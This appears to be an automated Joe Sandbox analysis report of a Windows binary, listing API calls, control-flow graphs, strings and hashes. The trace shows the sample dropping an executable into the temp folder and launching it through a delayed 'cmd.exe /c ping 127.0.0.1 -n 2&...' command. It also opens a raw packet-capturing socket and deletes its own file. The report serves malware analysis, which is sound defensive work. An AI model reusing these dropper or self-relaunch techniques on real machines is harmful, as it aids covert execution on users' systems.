                                                          • Part of subcall function 00401E2A: LoadIconA.USER32(00000000,00000080), ref: 00401EA5
                                                        • __p___argv.MSVCRT ref: 00401C9F
                                                        • ExitProcess.KERNEL32 ref: 00401CBE
                                                          • Part of subcall function 00401867: #823.MFC42(00100000), ref: 00401879
                                                          • Part of subcall function 00401867: memset.MSVCRT ref: 00401888
                                                          • Part of subcall function 00401867: __p___argv.MSVCRT ref: 00401897
                                                          • Part of subcall function 00401867: __p___argv.MSVCRT ref: 004018B9
                                                          • Part of subcall function 00401867: Sleep.KERNEL32(00000064), ref: 004018CE
                                                          • Part of subcall function 00401867: GetTickCount.KERNEL32 ref: 00401906
                                                          • Part of subcall function 00401867: GetTempPathA.KERNEL32(00000104,?), ref: 00401936
                                                          • Part of subcall function 00401867: wsprintfA.USER32 ref: 00401953
                                                          • Part of subcall function 00401867: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401973
                                                          • Part of subcall function 00401867: #823.MFC42(?), ref: 0040197F
                                                        • #2514.MFC42 ref: 00401CCA
                                                          • Part of subcall function 00401CEC: _EH_prolog.MSVCRT ref: 00401CF1
                                                          • Part of subcall function 00401CEC: #693.MFC42(?,?,00401CDE), ref: 00401D19
                                                          • Part of subcall function 00401CEC: #609.MFC42(?,?,00401CDE), ref: 00401D25
                                                          • Part of subcall function 00401CEC: #641.MFC42(?,?,00401CDE), ref: 00401D30
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: H_prolog__p___argv$#567#823$#1134#1146#1168#2514#324#609#641#693CountCreateExitFileIconLoadPathProcessSleepTempTickmemsetwsprintf
                                                        • String ID:
                                                        • API String ID: 4041608318-0
                                                        • Opcode ID: 76151f68726041c84d7ab328924840f8fb70c527e4686e21e076778c71525204
                                                        • Instruction ID: 6f737f08b995e68c62b9dff43b60cf904c1485ff509acee86472e34ce1649ac1
                                                        • Opcode Fuzzy Hash: 76151f68726041c84d7ab328924840f8fb70c527e4686e21e076778c71525204
                                                        • Instruction Fuzzy Hash: 17016D319511158BEB14FB65C90A7DCB7B4AF08328F0042BAA465B21E1EF789A45CA58

                                                        Control-flow Graph

                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000084,IMAGE), ref: 00401A46
                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401A54
                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401A69
                                                        • LockResource.KERNEL32(00000000,00000000), ref: 00401A74
                                                        • memcpy.MSVCRT(00000000,00000000), ref: 00401A7C
                                                        • wsprintfA.USER32 ref: 00401B2B
                                                        • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00401B38
                                                        • Sleep.KERNELBASE(00000064), ref: 00401B40
                                                        • memset.MSVCRT ref: 00401B4D
                                                        • wsprintfA.USER32 ref: 00401B74
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: Resource$wsprintf$CreateDirectoryFindLoadLockSizeofSleepmemcpymemset
                                                        • String ID: IMAGE

                                                        Control-flow Graph

                                                        control_flow_graph 68 402b5a-402b7a WSAStartup 69 402ba3 WSAGetLastError 68->69 70 402b7c-402b82 68->70 73 402ba9-402bac 69->73 71 402b84-402b90 70->71 72 402b9d WSACleanup 70->72 71->72 74 402b92-402b9b 71->74 72->69 74->73
                                                        APIs
                                                        Similarity
                                                        • API ID: CleanupErrorLastStartup
                                                        • String ID:

                                                        Control-flow Graph

                                                        control_flow_graph 75 4016df-401703 #561 __p___argv DeleteFileA
                                                        APIs
                                                        Similarity
                                                        • API ID: #561DeleteFile__p___argv
                                                        • String ID:

                                                        Control-flow Graph

                                                        control_flow_graph 76 4030ae-4030c3 #1576
                                                        APIs
                                                        • #1576.MFC42(?,?,?,V0@,00403056,00000000,?,0000000A), ref: 004030BE
                                                        Strings
                                                        Similarity
                                                        • API ID: #1576
                                                        • String ID: V0@

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 004022A4
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 0040290F
                                                          • Part of subcall function 004028B1: inet_ntoa.WS2_32(?), ref: 00402920
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 00402927
                                                          • Part of subcall function 004028B1: inet_ntoa.WS2_32(?), ref: 00402932
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 00402939
                                                          • Part of subcall function 004028B1: sprintf.MSVCRT ref: 0040299E
                                                          • Part of subcall function 004028B1: sprintf.MSVCRT ref: 004029A8
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00402305
                                                        • #540.MFC42 ref: 0040230E
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00402323
                                                        • #3998.MFC42(00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402342
                                                        • #6907.MFC42(?,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402352
                                                        • #6907.MFC42(?,00000002,?,?,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402362
                                                        • #2818.MFC42(?,%d/%d,?,?,?,00000002,?,?,00000001,?,00000001,00000000,?,00000000,00000000,00000000), ref: 00402376
                                                        • #6907.MFC42(?,00000003,?,00000000), ref: 00402388
                                                        • GetSystemTime.KERNEL32(?,?,00000003,?,00000000), ref: 00402391
                                                        • #2818.MFC42(?,%2.2d-%2.2d %2.2d:%2.2d:%2.2d,?,?,?,?,?), ref: 004023B9
                                                        • #6907.MFC42(?,?,?), ref: 004023CB
                                                        • #6007.MFC42(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004023DD
                                                        • #823.MFC42(00000008,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004023E8
                                                        • #823.MFC42(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 00402408
                                                        • memcpy.MSVCRT(00000000,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040241B
                                                        • #6007.MFC42(?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00402432
                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00402449
                                                        • #800.MFC42 ref: 00402456
                                                        Strings
                                                        Similarity
                                                        • API ID: #6907$strncpy$#2818#6007#823CriticalSectioninet_ntoasprintf$#3998#540#800EnterH_prologLeaveMessageSendSystemTimememcpy
                                                        • String ID: %2.2d-%2.2d %2.2d:%2.2d:%2.2d$%d/%d

                                                        Control-flow Graph

                                                        control_flow_graph 149 40271c-40273c socket 150 402742-402757 gethostname 149->150 151 40280f-402815 WSAGetLastError 149->151 150->151 153 40275d-4027ab gethostbyname htons memcpy bind 150->153 152 402848-40284c 151->152 153->151 154 4027ad-4027e0 setsockopt * 2 153->154 154->151 155 4027e2-40280d WSAIoctl 154->155 155->151 156 402817-40282f CreateThread 155->156 157 402831-402844 closesocket 156->157 158 402846 156->158 157->152 158->152
                                                        APIs
                                                        • socket.WS2_32(00000002,00000003,00000000), ref: 00402730
                                                        • gethostname.WS2_32(?,00000100), ref: 0040274E
                                                        • gethostbyname.WS2_32(?), ref: 00402764
                                                        • htons.WS2_32(?), ref: 00402779
                                                        • memcpy.MSVCRT(?,?,?), ref: 00402791
                                                        • bind.WS2_32(?,00000002,00000010), ref: 004027A2
                                                        • setsockopt.WS2_32(?,0000FFFF,?,?,?), ref: 004027C9
                                                        • setsockopt.WS2_32(?,00000000,00000002,?,?), ref: 004027DB
                                                        • WSAIoctl.WS2_32(?,98000001,?,?,?,00000028,?,00000000,00000000), ref: 00402804
                                                        • WSAGetLastError.WS2_32 ref: 0040280F
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000026B0,?,00000000,00000000), ref: 00402824
                                                        • closesocket.WS2_32(?), ref: 00402838
                                                        Similarity
                                                        • API ID: setsockopt$CreateErrorIoctlLastThreadbindclosesocketgethostbynamegethostnamehtonsmemcpysocket
                                                        • String ID:
                                                        APIs
                                                        Similarity
                                                        • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                                        • String ID:

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: sprintf$htons$strncpy$inet_ntoa$htonlmemcpystrcpy
                                                        • String ID: %s%c$%s:%d$FSRPAU$FSRPAU$Len=%d$flag:$type=%d,code=%d

                                                        Control-flow Graph

                                                        control_flow_graph 97 401160-4011b2 _EH_prolog #537 * 2 #540 98 4011b4-4011cb #2818 97->98 99 4011ea-40120c #6199 #2614 97->99 100 4011da-4011e8 #939 98->100 101 4011cd-4011d5 #941 98->101 102 401211-401219 99->102 103 40120e 99->103 100->98 100->99 101->100 104 4012f8-401346 #6199 * 2 #800 * 3 102->104 105 40121f-401224 102->105 103->102 106 401227-40122d 105->106 107 401233-401252 #2818 106->107 108 4012bd 106->108 110 401261-401271 #939 107->110 111 401254-40125c #941 107->111 109 4012c1-4012ca 108->109 112 4012e3-4012e7 109->112 113 4012cc-4012de #941 * 2 109->113 114 401273-40127c 110->114 115 401295-4012a4 #2818 110->115 111->110 116 4012f5 112->116 117 4012e9-4012ef 112->117 113->112 114->115 118 40127e-401293 #2818 114->118 119 4012a5-4012b5 #939 115->119 116->104 117->105 117->116 118->119 119->106 120 4012bb 119->120 120->109
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401165
                                                        • #537.MFC42(00406598), ref: 0040117E
                                                        • #537.MFC42(00406598,00406598), ref: 0040118B
                                                        • #540.MFC42(00406598,00406598), ref: 00401197
                                                        • #2818.MFC42(?,%6.6X,00000000,00406598,00406598), ref: 004011BE
                                                        • #941.MFC42(00406044), ref: 004011D5
                                                        • #939.MFC42(?), ref: 004011E1
                                                        • #6199.MFC42(?,00406598,00406598), ref: 004011F0
                                                        • #2614.MFC42(?,00406598,00406598), ref: 004011F8
                                                        • #2818.MFC42(?,%2.2X ,?,?,00406598,00406598), ref: 00401247
                                                        • #941.MFC42(00406038), ref: 0040125C
                                                        • #939.MFC42(?), ref: 00401268
                                                        • #2818.MFC42(?,00406034,?,?), ref: 0040128B
                                                        • #2818.MFC42(?,00406030,?), ref: 0040129E
                                                        • #939.MFC42(?,?), ref: 004012AC
                                                        • #941.MFC42(00406044,?,00406598,00406598), ref: 004012D5
                                                        • #941.MFC42(00406044,00406044,?,00406598,00406598), ref: 004012DE
                                                        • #6199.MFC42(?,?,00406598,00406598), ref: 00401301
                                                        • #6199.MFC42(?,?,?,00406598,00406598), ref: 0040130F
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 0040131B
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 00401327
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 00401333
                                                        Strings
                                                        Similarity
                                                        • API ID: #2818#941$#6199#800#939$#537$#2614#540H_prolog
                                                        • String ID: %2.2X $%6.6X$D`@

                                                        Control-flow Graph

                                                        APIs
                                                        • #823.MFC42(00100000), ref: 00401879
                                                        • memset.MSVCRT ref: 00401888
                                                        • __p___argv.MSVCRT ref: 00401897
                                                          • Part of subcall function 004017B2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004017ED
                                                        • __p___argv.MSVCRT ref: 004018B9
                                                          • Part of subcall function 004017B2: memset.MSVCRT ref: 00401814
                                                          • Part of subcall function 004017B2: ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 0040182C
                                                          • Part of subcall function 004017B2: memcpy.MSVCRT(?,?,?), ref: 00401847
                                                          • Part of subcall function 004017B2: CloseHandle.KERNEL32(?), ref: 00401859
                                                        • Sleep.KERNEL32(00000064), ref: 004018CE
                                                        • GetTickCount.KERNEL32 ref: 00401906
                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 00401936
                                                        • wsprintfA.USER32 ref: 00401953
                                                        • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401973
                                                        • #823.MFC42(?), ref: 0040197F
                                                        • Sleep.KERNEL32(00000064), ref: 0040198A
                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004019A0
                                                        • Sleep.KERNEL32(00000064), ref: 004019A4
                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004019B4
                                                        • CloseHandle.KERNEL32(?), ref: 004019B9
                                                        • #825.MFC42(?), ref: 004019C2
                                                        • #825.MFC42(?,?), ref: 004019CA
                                                        • __p___argv.MSVCRT ref: 004019E7
                                                        • wsprintfA.USER32 ref: 00401A04
                                                        • WinExec.KERNEL32(?,00000000), ref: 00401A15
                                                        • Sleep.KERNEL32(000001F4), ref: 00401A20
                                                        • ExitProcess.KERNEL32 ref: 00401A24
                                                        Strings
                                                        • cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 004019FE
                                                        • %s\%s.exe, xrefs: 0040194D
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: File$Sleep$__p___argv$#823#825CloseCreateHandleWritememsetwsprintf$CountExecExitPathProcessReadTempTickmemcpy
                                                        • String ID: %s\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
                                                        • API String ID: 4283993690-2816570591
                                                        • Opcode ID: a491cdb6d37c63822b2f5e0dabab34744de7fedee835b1f0fc382f0816b84e4c
                                                        • Instruction ID: 647a47b4171ebbf043bbf0605c80f25e9859b4608e82af673633275921c822a3
                                                        • Opcode Fuzzy Hash: a491cdb6d37c63822b2f5e0dabab34744de7fedee835b1f0fc382f0816b84e4c
                                                        • Instruction Fuzzy Hash: EB515EB2900109BFEB11ABE4DD49EDEBB79EF88300F1004B6F704B61A1DB755A548F69

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401F1E
                                                        • #4710.MFC42 ref: 00401F2B
                                                        • GetSystemMenu.USER32(?,00000000), ref: 00401F36
                                                        • #2863.MFC42(00000000), ref: 00401F3D
                                                        • #540.MFC42(00000000), ref: 00401F4C
                                                        • #4160.MFC42(00000065,00000000), ref: 00401F5B
                                                        • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401F79
                                                        • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401F85
                                                        • #800.MFC42(00000065,00000000), ref: 00401F90
                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401FB1
                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401FBF
                                                        • #823.MFC42(00000128), ref: 00401FC6
                                                        • #2086.MFC42(00000082), ref: 00401FFE
                                                        • #6215.MFC42(00000005,00000082), ref: 0040200F
                                                        • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00402021
                                                        • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 00402033
                                                        • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00402042
                                                        • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 00402050
                                                        • #3996.MFC42(00000000,00406328,00000000,00000028,000000FF), ref: 00402065
                                                        • #3996.MFC42(00000001,00406320,00000000,0000008C,000000FF,00000000,00406328,00000000,00000028,000000FF), ref: 0040207C
                                                        • #3996.MFC42(00000002,00406318,00000000,0000008C,000000FF,00000001,00406320,00000000,0000008C,000000FF,00000000,00406328,00000000,00000028,000000FF), ref: 0040208E
                                                        • #3996.MFC42(00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF,00000001,00406320,00000000,0000008C,000000FF,00000000), ref: 004020A1
                                                        • #3996.MFC42(?,00406308,00000000,00000064,000000FF,00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF,00000001), ref: 004020B4
                                                        • InitializeCriticalSection.KERNEL32(?,?,00406308,00000000,00000064,000000FF,00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF), ref: 004020C0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$#3996$Menu$Append$#2086#2863#4160#4710#540#6215#800#823CriticalH_prologInitializeSectionSystem
                                                        • String ID:
                                                        • API String ID: 2371848494-0
                                                        • Opcode ID: bf1e5139828ca2f7575a42d4d539cb4ceebe527546bc2a5505485d4eded29568
                                                        • Instruction ID: 22c113c14c16facbbd4b385fd64242b7c064b1ff54e6b864585585fb015a5088
                                                        • Opcode Fuzzy Hash: bf1e5139828ca2f7575a42d4d539cb4ceebe527546bc2a5505485d4eded29568
                                                        • Instruction Fuzzy Hash: 1B41E6B02407097BE6257B21CC86F6F769DFB84798F10063DF2A5761E1CBB96C008A68

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 159 40141d-40142c 160 401432-40147b SendMessageA * 3 159->160 161 4014ef-4014f4 159->161 162 4014ad-4014b5 160->162 163 40147d-4014ab SendMessageA * 3 160->163 164 4014e7-4014ee 162->164 165 4014b7-4014e5 SendMessageA * 3 162->165 163->162 164->161 165->164
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 0040144F
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040145E
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040146D
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040148D
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00401499
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004014AB
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004014C7
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004014D3
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004014E5
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: ad132ba9e6c3f3ed83570c34e1da1694867b5aed1bc06737ede0cc76b482b387
                                                        • Instruction ID: bb5fe5f59efd3e526b113e407ce870d9a6257fa786e4d84f1a1b66b5d905c888
                                                        • Opcode Fuzzy Hash: ad132ba9e6c3f3ed83570c34e1da1694867b5aed1bc06737ede0cc76b482b387
                                                        • Instruction Fuzzy Hash: 6B215B7161434DBFE721AF24CC80FABBFADFB44394F40052AB59852060C7716C28CBA1
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 00401527
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401536
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401545
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 00401565
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00401571
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 00401583
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040159F
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004015AB
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004015BD
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 99b8175f4789665816ee58ce95148e85964884c2d1b05ba2febfe70cb83b4eb1
                                                        • Instruction ID: d9274a69ea71e40b52450c2f1abff6bb4cc12b44bfabd653b35ee0167fd8c358
                                                        • Opcode Fuzzy Hash: 99b8175f4789665816ee58ce95148e85964884c2d1b05ba2febfe70cb83b4eb1
                                                        • Instruction Fuzzy Hash: 5A213B7161435DBFEB11AF25CC80FABBFADFB44384F40052AB59852160D7716D289BA1
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 0040137B
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040138A
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401399
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004013B5
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004013C1
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004013D3
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004013EF
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004013FB
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 0040140D
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 305f06924834a9908d84543f76578ecc6405ed01a93ac79d48c62636bf4700f6
                                                        • Instruction ID: 56a25f80e609cbd08b066c68ee1e37c059073ee632eaa49d0b548e2ccd918b9e
                                                        • Opcode Fuzzy Hash: 305f06924834a9908d84543f76578ecc6405ed01a93ac79d48c62636bf4700f6
                                                        • Instruction Fuzzy Hash: 49215CB160535DBFEB21AF258C80FABFFADFB44394F00052AB59852060C7716D28DBA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #567$#324BrushCreateH_prologSolid
                                                        • String ID: D@
                                                        • API String ID: 1271399592-116940557
                                                        • Opcode ID: a93d2b0ed926015932f3efea9d707e5f8f5c25ad2ce72d1844b1993bb421de03
                                                        • Instruction ID: 13884b46de095b52d8f8717c358092e8eec3470aa280cab25804e1b70b61f98b
                                                        • Opcode Fuzzy Hash: a93d2b0ed926015932f3efea9d707e5f8f5c25ad2ce72d1844b1993bb421de03
                                                        • Instruction Fuzzy Hash: 9D01FCB16003549BDB209F69C58978EBBE0FF81348F00443EE9926B2C2C7B85A08D765
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,00402216), ref: 00402237
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00402252
                                                        • #3286.MFC42(-00000001,?,?,?,?,?,00402216), ref: 00402261
                                                        • #825.MFC42(?,-00000001,?,?,?,?,?,00402216), ref: 0040226F
                                                        • #825.MFC42(00000000,?,-00000001,?,?,?,?,?,00402216), ref: 00402275
                                                        • SendMessageA.USER32(?,00001008,-00000001,00000000), ref: 0040228A
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,00402216), ref: 00402294
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #825CriticalMessageSectionSend$#3286EnterLeave
                                                        • String ID:
                                                        • API String ID: 2141797828-0
                                                        • Opcode ID: 345f4108f9338b5cd1efb657daf810a46913b3e0c3edca353be0c7de5a5d4693
                                                        • Instruction ID: b9e60a6790c5ed3c642633d5835f906307b00da717bc424c3a2b37c864f405ef
                                                        • Opcode Fuzzy Hash: 345f4108f9338b5cd1efb657daf810a46913b3e0c3edca353be0c7de5a5d4693
                                                        • Instruction Fuzzy Hash: 64F0F472205215BFE2156B61EE09F8BBB58FF84321F10013BF709B20E19BF4680096A8
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401E2F
                                                        • #324.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E41
                                                        • #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E4F
                                                        • #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E66
                                                        • #1168.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E91
                                                        • #1146.MFC42(00000080,0000000E,00000080,00000066,?,?,?,?,00401C92,00000000), ref: 00401E9F
                                                        • LoadIconA.USER32(00000000,00000080), ref: 00401EA5
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
